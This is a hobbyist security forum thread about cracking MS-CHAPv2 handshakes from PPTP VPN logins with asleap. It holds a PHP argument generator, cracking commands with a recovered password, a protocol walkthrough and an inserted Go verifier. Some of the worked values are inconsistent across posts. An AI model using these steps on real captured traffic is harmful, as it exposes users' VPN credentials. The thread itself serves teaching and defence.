Episode 6x12


22 replies to this topic

#1 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 04 November 2009 - 11:53 AM

Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.

#2 Iain

Iain

    Hak5 Pirate

  • Active Members
  • 319 posts

Posted 04 November 2009 - 02:01 PM

QUOTE (Darren Kitchen @ Wed, 04 Nov 2009 21:53:03 +0000)
Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.

Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.

#3 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 04 November 2009 - 03:00 PM

QUOTE (Iain @ Wed, 04 Nov 2009 19:01:39 +0000)
Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.



I've uploaded one of my test packet captures to http://www.hak5.org/files/cap5.dump and the corresponding wordlist to http://www.hak5.org/files/wordlist.txt

The challenge is BEB90BD54A9D289758C9AE837944BC1B
The response is 725423423D1D0EB68B10DCB78743F97F0000000000000000

The username is "david" and the password is MurphyDade109 (If you check the wordlist you'll notice that before using Paul as a target I was going to go with characters from the movie Hackers.)

Feel free to have a go at it.

I did notice that if I told the RRAS server to only use CHAP instead of CHAPv2 I would get the expected 8 byte (16 chr) challenge, but the response would be all zeroes. Odd.

It kinda sucks that I wasn't able to produce a working demo but this happens from time to time and instead of scrapping the segment altogether (time constraints) I just made it work. Kinda. Anyway, hopefully someone else will have better luck and I hope to get this figured out soon.

#4 Iain

Iain

    Hak5 Pirate

  • Active Members
  • 319 posts

Posted 04 November 2009 - 04:34 PM

My challenge for the weekend!

#5 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 04 November 2009 - 05:52 PM

Pun intended?

I can't get it to work either. The challenge is too long for MS-CHAPv2, and for CHAP the response is just a bunch of zeroes.

(Why does ASLEAP compile under Backtrack 4 Pre-Final, but not under Ubuntu 9.04? Did I miss something?)
"Why is it 'marketing' when a company helps itself to my information against my will and 'piracy' or 'industrial espionage' if I helped myself to THEIR information against their will ?"

#6 Sc00bz

Sc00bz

    Hackling

  • Active Members
  • 15 posts
  • Gender:Male

Posted 04 November 2009 - 06:47 PM

Hmm I guess Darren doesn't read his email. Well here's what I emailed him.
CODE
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>asleap 2.2 Argument Generator</title>
<script type="text/javascript">
// <![CDATA[
// I so stole this function from phpBB
function selectCode()
{
   // Get ID of code block
   var e = document.getElementsByTagName('CODE')[0];

   // Not IE
   if (window.getSelection)
   {
      var s = window.getSelection();
      // Safari
      if (s.setBaseAndExtent)
      {
         s.setBaseAndExtent(e, 0, e, e.innerText.length - 1);
      }
      // Firefox and Opera
      else
      {
         var r = document.createRange();
         r.selectNodeContents(e);
         s.removeAllRanges();
         s.addRange(r);
      }
   }
   // Some older browsers
   else if (document.getSelection)
   {
      var s = document.getSelection();
      var r = document.createRange();
      r.selectNodeContents(e);
      s.removeAllRanges();
      s.addRange(r);
   }
   // IE
   else if (document.selection)
   {
      var r = document.body.createTextRange();
      r.moveToElementText(e);
      r.select();
   }
}
// ]]>
</script>
</head>
<body>
<div style="width:90%; margin:auto;">
<?php
if (isset($_GET['u'], $_GET['c'], $_GET['r']))
{
    $c = str_replace(':', '', $_GET['c']);
    $r = str_replace(':', '', $_GET['r']);
    $chapChallengeGood = preg_match("/^[0-9a-f]{32}$/i", $c);
    $chapResponseGood  = preg_match("/^[0-9a-f]{98}$/i", $r);
    if ($chapChallengeGood == 0)
    {
        echo 'Invalid CHAP Challenge.<br />';
    }
    if ($chapResponseGood == 0)
    {
        echo 'Invalid CHAP Response.<br />';
    }
    if ($chapChallengeGood && $chapResponseGood)
    {
        // **** This is the interesting part ****
        $userName = $_GET['u'];
        $authChallenge = pack('H*', $c);
        $peerChallenge = pack('H*', substr($r, 0, 32));
        $challenge = substr(sha1($peerChallenge . $authChallenge . $userName), 0, 16);
        $response = substr($r, 48, 48);
        $challenge = preg_replace("/([0-9a-f]{2})/i", '$1:', $challenge, 7);
        $response = preg_replace("/([0-9a-f]{2})/i", '$1:', $response, 23);
        // **** This is the interesting part ****
    }
}
?>
    <form method="get">
        User Name:<br />
        <input type="text" name="u" /><br />
        <br />
        "PPP CHAP Challenge" (16 bytes, 32 Hex characters):<br />
        <input type="text" name="c" size="45" /><br />
        <br />
        "PPP CHAP Response" (49 bytes, 98 Hex characters):<br />
        <input type="text" name="r" size="137" /><br />
        <input type="submit" value="Generate asleap arguments" />
    </form>
<?php
if (isset($challenge, $response))
{?>    <br />
    <a href="#" onclick="selectCode(); return false;">Select All</a><br />
    <div style="overflow:auto; width:100%;"><code style="white-space:pre;">./asleap -C <?php echo $challenge; ?> -R <?php echo $response; ?> -f words.dat -n words.idx</code></div>
<?php
}
?>
</div>
</body>
</html>

The PHP file will convert the CHAP challenge and response packet data into asleap arguments.

To copy the data from the packet right click on the value then "Copy" -> "Bytes (Hex Stream)" or "Copy" -> "Value" (if you have a newer version of Wireshark). "Copy" -> "Value" inserts the colons in between each byte which isn't necessary for the PHP file.

Your example in 6x12:
"CHAP Challenge": e1c0e8923252b20b5561ddf404310826
"CHAP Response": d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce1267513fcf682b521800

"CHAP Challenge" packet is the "auth challenge" 16 byte value.
"CHAP Response" packet has the "peer challenge" 16 byte value and the peer response 24 byte value.

user name is paul
auth challenge is e1c0e8923252b20b5561ddf404310826
peer challenge is d4cfa66f00364d66fbf65f85de927930
peer response is 025b3bae30a50be25e47625c2d13ce1267513fcf682b5218
this gives you a challenge of 6a0062c675397a16
I do not know what the null characters are for, but they are probably just there for padding.

You should get this from the PHP file:
./asleap -C 6a:00:62:c6:75:39:7a:16 -R 02:5b:3b:ae:30:a5:0b:e2:5e:47:62:5c:2d:13:ce:12:67:51:3f:cf:68:2b:52:18 -f words.dat -n words.idx

When you run that with your word list it says:
CODE
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        ebcd
    Could not find a matching NT hash.  Try expanding your password list.
    I've given up.  Sorry it didn't work out.


It found the hash bytes but the password seems to not be in the word list. Also you can't create a useful rainbow table for this since you only have 2 bytes of the hash.

-------------------

For the one posted above do the same thing.
user name is david
"CHAP Challenge" is e1c0e8923252b20b5561ddf404310826
"CHAP Response" is d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce1267513fcf682b521800

This gives you:
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

Now run:
./genkeys -r wordlist.txt -f words.dat -n words.idx
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

And you'll get:
CODE
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        31cf
    NT hash:           5635283972918a8f9fb608418d9331cf
    password:          MurphyDade109


#7 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 04 November 2009 - 08:43 PM

Nice.

#8 BuddhaChu

BuddhaChu

    Hak5 Fan

  • Active Members
  • 28 posts

Posted 04 November 2009 - 11:00 PM

Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.

http://revision3.com...ead.php?t=31345

#9 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 05 November 2009 - 10:32 AM

QUOTE (Sc00bz @ Thu, 05 Nov 2009 00:47:17 +0000)
Hmm I guess Darren doesn't read his email.




I want to read it all, honestly I do. And I will, eventually. But I have a to-do list a mile long and all I can attack these buckets of email with is a soup spoon.

Anyway, thanks. I need to wrap my head around those functions. I knew it had something to do with the encoding. I'll be sure to highlight this in a coming episode. Probably not the very next since it'll be live at Va Tech.

QUOTE (BuddhaChu @ Thu, 05 Nov 2009 05:00:17 +0000)
Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.


There was an editing mistake that caused a re-render and re-release of the show. You may have caught a bad version. Is it still messed up?

(If you caught the show early and pay attention to the bear ad you'll see what I mean)

#10 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 05 November 2009 - 03:55 PM

Good episode!!!

asleap is a good tool IF you can get it to work, you have all the info that you need to perform a successful attack, and you have a dictionary large enough and tailored enough to make a successful go at it.

I am just blown away that after weeks of throwing the request out........ Paul finally made it in front of the camera, and not only that, we see him in his awesome party suit for the domain.com sponsor spot. That was worth the wait!!! As well as the look of pure horror on Jason's face when he opened the door to see Paul in the Pink Party Suit

Paul, I am glad that they released you from your chains of bondage behind the camera. I hope that this is going to be an ongoing trend and not just when Snubs and Matt abandon Darren for parts unknown. Stand up for your rights, camera guy, and demand a segment of your own!!!

Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her

It's great to see Hak5 back to real hacking again, brings a warm fuzzy to my old heart!
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard

#11 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 05 November 2009 - 04:21 PM

QUOTE (Wetwork @ Fri, 06 Nov 2009 07:55:36 +0000)
Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her

Where did you get that from?

#12 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 05 November 2009 - 04:58 PM

QUOTE (Psychosis @ Thu, 05 Nov 2009 16:21:28 +0000)
Where did you get that from?


Darren mentioned it when he was creating the list of Paul passwords for asleap... Don't know if he was just "rolling" with it for the sake of the segment or if it was true...

#13 Netshroud

Netshroud

    Hak5 Enthusiast

  • Active Members
  • 1,321 posts
  • Gender:Male
  • Location:meterpreter>

Posted 05 November 2009 - 05:45 PM

I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed off cupp.py, and that they had a son named Paul.

#14 Coreyja

Coreyja

    Hak5 Fan

  • Members
  • 20 posts
  • Gender:Male
  • Location:80126

Posted 06 November 2009 - 04:08 AM

QUOTE (Wetwork @ Thu, 05 Nov 2009 14:55:36 +0000)
Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her


I could be totally wrong on this so don't yell at me but aren't Snubs and Darren going out?

#15 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 06 November 2009 - 08:51 AM

QUOTE (Psychosis @ Thu, 05 Nov 2009 17:45:30 +0000)
I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed off cupp.py, and that they had a son named Paul.


Snubs, you sexy minx, getting around aren't you

Whoever Shannon is going out with, he is a lucky guy.

#16 Jason Cooper

Jason Cooper

    Hak5 Pirate

  • Active Members
  • 461 posts
  • Gender:Male
  • Location:Great Britain
  • Interests:Cards,
    Computers,
    Cryptography,
    Hacking,
    Lock Picking,
    Programming,
    And many more

Posted 06 November 2009 - 11:07 AM

QUOTE (Wetwork @ Thu, 05 Nov 2009 20:55:36 +0000)
Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her


I was going to say something about it not being on 16yo Hak5 fans but then realised I was starting to sound like a crazy stalker/serial killer

#17 Wetwork

Wetwork

    Hak5 Zombie

  • Active Members
  • 163 posts
  • Gender:Male
  • Location:New Yawk

Posted 06 November 2009 - 01:34 PM

QUOTE (scrapheap @ Fri, 06 Nov 2009 11:07:02 +0000)
I was going to say something about it not being on 16yo Hak5 fans but then realised I was starting to sound like a crazy stalker/serial killer


I'm sure that there are many Hak5 fans of all ages that are stripping their cable over Snubs, but in reality who could blame them, she is a hottie.

#18 Darren Kitchen

Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • 3,809 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 17 November 2009 - 06:04 PM

Comments from Sc00bz code:

CODE
"pack('H*', $str)" converts $str from a hex string to binary data. This is the opposite of the PHP function bin2hex(). I would love to just use hex2bin() but that function doesn't exist in PHP.

--------------------------

In MS-CHAPv2 (RFC 2759) the server sends a 16 byte authenticator challenge to the client and the client generates another 16 bytes of random data called the peer challenge. Using the peer challenge, authenticator challenge, and user name the client generates the 8 byte challenge. Then using the 8 byte challenge the client generates the response and sends the peer challenge and the response.

// Short version (just the 8 byte challenge generation):
// sha1() is the same one in PHP
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
// ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
challenge = substr(sha1BinaryData, 0, 8)
// ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)


You can stop here if you just want to know how the 8 byte challenge is generated.


// Long version (full MS-CHAPv2):
response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use

string /*24 bytes*/ MS_CHAPv2(string userName, string authenticatorChallenge /*16 bytes*/, string peerChallenge /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}

// sha1() is the same one in PHP
string sha1(string str[, bool raw_output = false])
{
// If the optional raw_output is set to TRUE, then
// the sha1 digest is instead returned in raw binary
// format with a length of 20, otherwise the returned
// value is a 40-character hexadecimal number.
}

string /*24 bytes*/ ChallengeResponse(string challenge /*8 bytes*/, string hash /*16 bytes*/)
{
hashPadded = hash . "\x00\x00\x00\x00\x00" // cat 5 null characters

response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
return response
}

string /*8 bytes*/ DesEncrypt(string message /*8 bytes*/, string key /*7 bytes*/)
{
// Encrypts message using key and returns cipher text (8 bytes).
}

-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
// { inside of MS_CHAPv2()
// sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true)
// // ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
// challenge = substr(sha1BinaryData, 0, 8)
// // ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)
// response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
// // { inside of ChallengeResponse()
// // hashPadded = ntlmHash . "\x00\x00\x00\x00\x00" // cat 5 null characters
// // // 8846f7eaee8fb117ad06bdd830b7586c0000000000
// //
// // response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
// // return response
// // // bc4acb4a3953680e = DesEncrypt(ab8031f17836bd56, 8846f7eaee8fb1)
// // // ... abd6fd979ad078aa .= DesEncrypt(ab8031f17836bd56, 17ad06bdd830b7)
// // // ... 5c21b44e13ea7df2 .= DesEncrypt(ab8031f17836bd56, 586c0000000000)
// // // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// // }
// return response
// // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// }
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use
// 706565725f6368616c6c656e67652e2e0000000000000000bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df200

--------------------------
--------------------------

Just for completeness here is MS-CHAPv1:
In MS-CHAPv1 (RFC 2433) the server sends the 8 byte challenge to the client and the client returns lmResponse and ntlmResponse. This is the same algorithm as NTLMv1 for SMB shared folders. Rainbow tables (halflmchall, lmchall, ntlmchall) can be made to attack this algorithm by spoofing a server with a constant challenge; most commonly the challenge is 1122334455667788.

response = MS_CHAPv1(challenge, lmHash, ntlmHash)
responsePacketValue = response .
"\x0?"; // "Use Windows NT compatible challenge response" flag

string /*48 bytes*/ MS_CHAPv1(string challenge /*8 bytes*/, string lmHash /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
response = ChallengeResponse(challenge, lmHash) // 24 bytes returned
response .= ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}
/* Quoted from RFC 2433:
The "use Windows NT compatible challenge response" flag, if 1,
indicates that the Windows NT response is provided and should be used
in preference to the LAN Manager response. The LAN Manager response
will still be used if the account does not have a Windows NT password
hash, e.g. if the password has not been changed since the account
was uploaded from a LAN Manager 2.x account database. If the flag is
0, the Windows NT response is ignored and the LAN Manager response is
used. Since the use of LAN Manager authentication has been
deprecated, this flag SHOULD always be set (1) and the LAN Manager
compatible challenge response field SHOULD be zero-filled.
*/

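An added example, not code from Sc00bz, Darren or any other poster in this thread: a Go program that does what Sc00bz's PHP page (post #6) and the pseudocode above (post #18) describe, but from the authenticator's side. It splits a captured "PPP CHAP Challenge"/"PPP CHAP Response" pair into its fields, derives the 8-byte challenge as the first 8 bytes of SHA1(peer challenge || authenticator challenge || user name), and recomputes the 24-byte NT response with three DES blocks keyed from the zero-padded NT hash, which is exactly the comparison an RRAS or RADIUS server performs. The sample values are the "david" handshake from this thread (Darren's authenticator and peer challenges, the NT response from Sc00bz's -R argument, and the NT hash asleap printed), reassembled into the 49-byte response value. The type and function names (Handshake, ParseHandshake, ChallengeHash, ChallengeResponse, Verify) are the example's own; the NT hash is taken as an input because MD4 is not in the Go standard library.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"strings"
)

// Handshake holds what an MS-CHAPv2 (RFC 2759) authenticator needs to check one
// exchange: the CHAP Challenge value plus the fields packed into the CHAP Response value.
type Handshake struct {
	UserName      string
	AuthChallenge []byte // 16 bytes, chosen by the server
	PeerChallenge []byte // 16 bytes, chosen by the client
	NTResponse    []byte // 24 bytes
	Flags         byte   // reserved, zero
}

// ParseHandshake accepts hex as copied from Wireshark (colons optional, either case)
// and splits the response value into PeerChallenge(16) || Reserved(8, zero) || NTResponse(24) || Flags(1).
func ParseHandshake(user, challengeHex, responseHex string) (*Handshake, error) {
	unhex := func(s string) ([]byte, error) {
		return hex.DecodeString(strings.ReplaceAll(s, ":", ""))
	}
	c, err := unhex(challengeHex)
	if err != nil || len(c) != 16 {
		return nil, fmt.Errorf("CHAP Challenge must be 16 bytes (32 hex chars)")
	}
	r, err := unhex(responseHex)
	if err != nil || len(r) != 49 {
		return nil, fmt.Errorf("CHAP Response must be 49 bytes (98 hex chars)")
	}
	if !bytes.Equal(r[16:24], make([]byte, 8)) {
		return nil, fmt.Errorf("reserved bytes 16..23 of the response must be zero")
	}
	return &Handshake{user, c, r[:16], r[24:48], r[48]}, nil
}

// ChallengeHash (RFC 2759 ChallengeHash()): first 8 bytes of
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
func ChallengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// desKey spreads a 7-byte key over the 8 bytes crypto/des expects; the low bit
// of each output byte is the parity position, which DES ignores.
func desKey(k7 []byte) []byte {
	k := make([]byte, 8)
	k[0] = k7[0]
	for i := 1; i < 7; i++ {
		k[i] = k7[i-1]<<(8-i) | k7[i]>>i
	}
	k[7] = k7[6] << 1
	return k
}

// ChallengeResponse (RFC 2759 ChallengeResponse()): pad the 16-byte NT hash with
// 5 zero bytes and DES-encrypt the 8-byte challenge under each 7-byte third.
func ChallengeResponse(challenge, ntHash []byte) []byte {
	padded := append(append([]byte{}, ntHash...), make([]byte, 5)...)
	out := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		block, _ := des.NewCipher(desKey(padded[i : i+7])) // key is always 8 bytes, so no error
		ct := make([]byte, 8)
		block.Encrypt(ct, challenge)
		out = append(out, ct...)
	}
	return out
}

// Verify is the authenticator's check: recompute the response from the stored
// NT hash and compare it with the one the peer sent.
func Verify(h *Handshake, ntHash []byte) bool {
	expected := ChallengeResponse(ChallengeHash(h.PeerChallenge, h.AuthChallenge, h.UserName), ntHash)
	return bytes.Equal(expected, h.NTResponse)
}

func main() {
	// Values taken from this thread: Darren's cap5.dump fields, Sc00bz's -R argument
	// (the NT response) and the NT hash asleap printed, joined into one 49-byte value.
	response := "725423423D1D0EB68B10DCB78743F97F" + "0000000000000000" +
		"266a6357d7101b4c895ed03732bb6b382d8967a996043363" + "00"
	h, err := ParseHandshake("david", "BEB90BD54A9D289758C9AE837944BC1B", response)
	if err != nil {
		panic(err)
	}
	ntHash, _ := hex.DecodeString("5635283972918a8f9fb608418d9331cf")
	fmt.Printf("8-byte challenge: %x\n", ChallengeHash(h.PeerChallenge, h.AuthChallenge, h.UserName))
	fmt.Println("response matches stored NT hash:", Verify(h, ntHash))
}
```

Run it as an ordinary Go program. Verify returning true for the stored hash is the whole of the server-side check: the only secret in the exchange is the 16-byte NT hash, the challenge it is applied to is 8 bytes, and the third DES block uses just 2 bytes of key (the "hash bytes" asleap prints), which is why the thread's move from PPTP to L2TP/IPSec is the right response rather than a longer password list.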

#19 someone

someone

    Newbie

  • Members
  • 3 posts

Posted 27 February 2010 - 06:43 AM

Could I get some help?

From Wireshark you can get username, challenge and response, yes?
But using Wireshark, is there a way to get the peer response or "challenge of"? (Don't think so, because of Darren's post)
The reason why I ask: after using Wireshark to capture the handshake, then using the following command, I get the following error:
CODE
# ./asleap -r /root/mine.dump -W /root/dics/common-1.txt
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "/root/dics/common-1.txt".
Unsupported pcap datalink type: (1)
Closing pcap ...

Any idea how I can get "peer response" or fix the asleap problem?

Sc00bz, thanks for the PHP code. But is it right that your paul and david's CHAP Challenge and CHAP Response are the same? Just the usernames are different?

Anyway - I've made up this table, I hope to clean things up....

The "paul" example:
CODE
Username        : paul

challenge       : e1c0e8923252b20b5561ddf404310826
response        : d4cfa66f00364d66fbf65f85de9279300000000000000000...
response(CUT)   : d4cfa66f00364d66fbf65f85de927930

peer response   : 025b3bae30a50be25e47625c2d13ce1267513fcf682b5218
challenge of    : 6a0062c675397a16
hash bytes:     : ???

CHAP Challenge  : e1c0e8923252b20b5561ddf404310826
CHAP Response   : d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce1267513fcf682b521800


The "david" example:
CODE
username        : david

auth challenge  : BEB90BD54A9D289758C9AE837944BC1B
peer challenge  : 725423423D1D0EB68B10DCB78743F97F
peer challenge  : 725423423D1D0EB68B10DCB78743F97F0000000000000000...

peer response   : ???
challenge of    : ???
hash bytes:     : ???

CHAP Challenge  : BEB90BD54A9D289758C9AE837944BC1B
CHAP Response   : ???


The "data/pptp.dump" example
CODE
username        : scott

challenge       : E3A5D0775370BDA51E16219A06B0278F
response(CUT)   : 84C4B33E00D9231645598ACF91C38480
response        : 84C4B33E00D9231645598ACF91C384800000000000000000......

peer response   : 565fe2492fd5fb88edaec934c00d282c046227406c31609b
challenge of    : 7c00a1a403ca7df5
hash bytes:     : 816b

CHAP Challenge  : E3A5D0775370BDA51E16219A06B0278F
CHAP Response   : 84C4B33E00D9231645598ACF91C384800000000000000000565fe2492fd5fb88edaec934c00d282c046227406c31609b00


#20 leroy

leroy

    Newbie

  • Members
  • 3 posts

Posted 14 March 2010 - 08:32 AM

Darren, thanks for this very interesting information. But I didn't get it going anyhow. It would be so awesome to see this hack working in real life!

I researched the net and didn't find any useful hint that we could get this going with asleap.

None of the well known forums has a proof of concept for it - so who is going to be first?





